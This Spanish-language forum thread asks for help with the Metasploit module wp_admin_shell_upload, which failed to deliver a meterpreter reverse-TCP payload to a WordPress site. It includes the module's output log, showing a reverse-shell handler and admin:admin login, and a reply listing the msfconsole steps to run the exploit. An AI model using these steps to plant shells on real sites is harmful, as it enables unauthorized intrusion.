Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: k4rv en 12 Abril 2018, 22:11 pm



Título: Exploit para wordpress
Publicado por: k4rv en 12 Abril 2018, 22:11 pm
Muy buenas a todos, lo primero de todo saludaros pues soy nuevo. (y como suele ocurrir siempre nos solemos animar por dudas)
Creo que no me equivoco de hilo..no soy experto.

El problema que tengo es un exploit para wordpress "unix/webapp/wp_admin_shell_upload", en el cual dentro de sus opciones tengo la validación "ok" de usuario administrador pero al cargar payload tengo problemas y me sale lo siguiente:

  • Started reverse TCP handler on 192.168.138.145:4444
  • Authenticating with WordPress using admin:admin...
  • Authenticated with WordPress
  • Preparing payload...
  • Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
  • Exploit completed, but no session was created.


En este intento concretamente lo intente con el payload: "php/meterpreter/reverse_tcp"
pero tambien lo intente con otros y el mismo resultado.
He desactivado el firewall por si acaso.

Alomejor es problema de vulnerabilidad pero no estoy seguro.

Mil gracias de antemano
Saludos


Título: Re: Exploit para wordpress
Publicado por: Shell Root en 12 Abril 2018, 22:35 pm
Código
  1. msf > use exploit/unix/webapp/wp_admin_shell_upload
  2. msf exploit(wp_admin_shell_upload) > show targets
  3. ...targets...
  4. msf exploit(wp_admin_shell_upload) > set TARGET <target-id>
  5. msf exploit(wp_admin_shell_upload) > show options
  6. ...show and set options...
  7. msf exploit(wp_admin_shell_upload) > exploit

:https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload


Título: Re: Exploit para wordpress
Publicado por: k4rv en 13 Abril 2018, 08:49 am
Esta tarde le doy más vueltas según tu respuesta.

Muchas gracias ;)